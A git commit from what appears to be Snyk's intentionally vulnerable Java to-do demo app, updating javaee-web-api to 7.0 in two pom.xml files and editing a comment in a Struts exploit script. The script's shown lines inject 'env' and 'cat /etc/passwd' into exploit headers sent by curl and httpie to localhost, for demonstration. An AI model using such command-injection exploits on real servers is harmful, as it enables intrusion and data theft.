Merge pull request snyk-labs#238 from snyk/chore/javaee-web-api

Mila Votradovec · web-flow · commit 3c7e053dad5f · 2020-07-22T11:31:35.000+02:00
chore: update javaee-web-api
diff --git a/exploits/struts-exploit.sh b/exploits/struts-exploit.sh
@@ -1,4 +1,4 @@
 # Struts exploit using curl and httpie (more colourful HTTP client)
-(runs 'env' or 'cat /etc/passwd', can replace env with any other command (note to escape slashes and double quotes)
+# (runs 'env' or 'cat /etc/passwd', can replace env with any other command (note to escape slashes and double quotes)
 cat struts-exploit-headers.txt| sed "s/COMMAND/env/" | xargs curl -v -X GET http://localhost:8080 -H
 cat struts-exploit-headers.txt| sed "s/COMMAND/cat \/etc\/passwd/" | xargs http -v http://localhost:8080
diff --git a/todolist-web-common/pom.xml b/todolist-web-common/pom.xml
@@ -29,7 +29,7 @@
         <dependency>
             <groupId>javax</groupId>
             <artifactId>javaee-web-api</artifactId>
-            <version>6.0</version>
+            <version>7.0</version>
         </dependency>
 
         <!--jstl-->
diff --git a/todolist-web-struts/pom.xml b/todolist-web-struts/pom.xml
@@ -28,7 +28,7 @@
         <dependency>
             <groupId>javax</groupId>
             <artifactId>javaee-web-api</artifactId>
-            <version>6.0</version>
+            <version>7.0</version>
             <scope>provided</scope>
         </dependency>
 
